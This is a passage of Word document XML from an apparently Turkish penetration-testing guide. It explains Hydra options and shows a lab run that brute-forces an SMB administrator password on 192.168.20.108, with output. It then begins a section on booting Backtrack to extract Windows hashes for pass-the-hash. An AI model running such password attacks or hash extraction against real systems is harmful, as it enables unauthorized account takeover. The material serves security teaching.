          <w:p w14:paraId="1EE36356" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: parametresi ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>bilinen bir kullanıcı adı dene</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">mesi için </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>verilir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14669643" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-L</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>parametresi ile i</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>çerisinde kullanıcı listesi bulunan dosya referans gösterilir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9F4EC6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: parametresi ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">bilinen bir parola değeri </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">denemesi </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">için </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>verilir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="009DD1E2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">parametresi ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>içerisinde parola</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> listesi </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>bulunduran dosyanın referans gösteril</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ir</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4189774F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">parametresi </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kullanıcı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Adı/parola değerlerini arada “:” bulunacak şekilde barındıran bir dosyanın referans verilmesi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> için kullanılır.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B2F1FC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-M</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>parametresi s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>aldırı için kullanılacak IP adreslerini barındıran dosyanın referans verilmesi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> için kullanılır.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FA1F25" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> -t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> hedef sisteme aynı anda kaç isteğin gönderil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">eceğini </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>belirleyen parametre</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>dir.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (varsayılan değer:16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5525E001" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290F691F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu uygulamada hedef sistemin IP adresi 192.168.20.108 dir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F408D2C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hedef sistemde oturum bilgilerini ele geçirmek için kullanılacak kullanıcı adı Administrator’dür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A74B2B0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu uygulama için hydra kullanımı ve çıktısı aşağıda verilmiştir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00D848DB" w14:paraId="39E9BD7B" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="69F804BE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@kali:~/Desktop# hydra -l administrator -P wordlist.txt smb://192.168.20.108</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADAE222" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra v7.6 (c)2013 by van Hauser/THC &amp; David Maciejak - for legal purposes only</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A222EE1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C6D69BF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-03 09:09:17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7E8F77" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E52A239" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[DATA] 1 task, 1 server, 101 login tries (l:1/p:101), ~101 tries per task</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33261DF4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[DATA] attacking service smb on port 445</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5857EAC9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[445][smb] host: 192.168.20.108   login: administrator   password: 123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD7165C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1 of 1 target successfully completed, 1 valid password found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39818C22" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-03 09:09:18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5716FC50" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DA60BB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanılan parametreler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBDAD56" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcı adını</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAFC06B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parolaların b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ulunduğu</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dosyayı </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>göstermektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33758C3C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smb://192.168.20.108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hedef sisteme smb protokolü üzerinden denemeler yapılacağını göstermektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F919896" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F979493" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B9C54" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00147513" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc430104867"/>
      <w:r w:rsidRPr="00147513">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.12. </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00147513">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Offline Windows Parola Elde Etme Çalışmaları</w:t>
        </w:r>
        <w:bookmarkEnd w:id="14"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7518FC95" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="5A9ED790" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Açıklama</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: Pass-the-hash yapmak veya yetki yükseltmek için Windows sistemin Backtrack(veya türevleri) ile boot edilmesi sızma testlerinde önemli bir çalışmadır. Aynı zamanda unutulan Windows parolalarını sıfırlamak için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>de alternatif bir yol olabilir. Bu yazıda pass-the-hash için Windows sistemden hash bilgisini alma, kullanıcıya yetki verme ve kullanıcı parolasını sıfırlama konuları incelenmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC09DD6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Kullanılan işletim sistemi Backtrack 5 R3 32 bit, hedef sistem ise Windows 7 Starter’dır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73CB25" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77453151" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hazırlık</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481D954" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bootable Taşınabilir Diskler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B2A61" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Başlangıç olarak Backtrack'i (veya Kali'yi) bir USB veya CD/DVD'ye yazmak için Linux ortamda UNetbootin uygulaması kullanılabilir. Bu araç çift tıklama ile çalıştırılabilir. Çalıştırıldığında şekildeki gibi bir arayüz çıkar ve kolayca herhangi bir işletim sistemi taşınabilir ortamda boot edilebilir şekilde yazılır. Windows ortamda da Unetbootin veya herhangi bir disk yazma aracı kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415B44A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F247C8" wp14:editId="2AB89DCC">
            <wp:extent cx="5012055" cy="3709670"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="153" name="Resim 153" descr="https://lh3.googleusercontent.com/VmBQiQHsVTuckWzzFh6-31hRURgXs4GztIWnWSBRiUENx7N-H519AOYEAoaT7hFPt_ZyuqdZxNyCbYsi2762kLyvryO5iAPzPYUbgMluKFB30AEQ259uhT4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mBQiQHsVTuckWzzFh6-31hRURgXs4GztIWnWSBRiUENx7N-H519AOYEAoaT7hFPt_ZyuqdZxNyCbYsi2762kLyvryO5iAPzPYUbgMluKFB30AEQ259uhT4Ez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2055" cy="3709670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB247D6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357AA520" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1D81EF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300E8857" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38913544" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B54C5E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BIOS Ayarları</w:t>
      </w:r>
    </w:p>
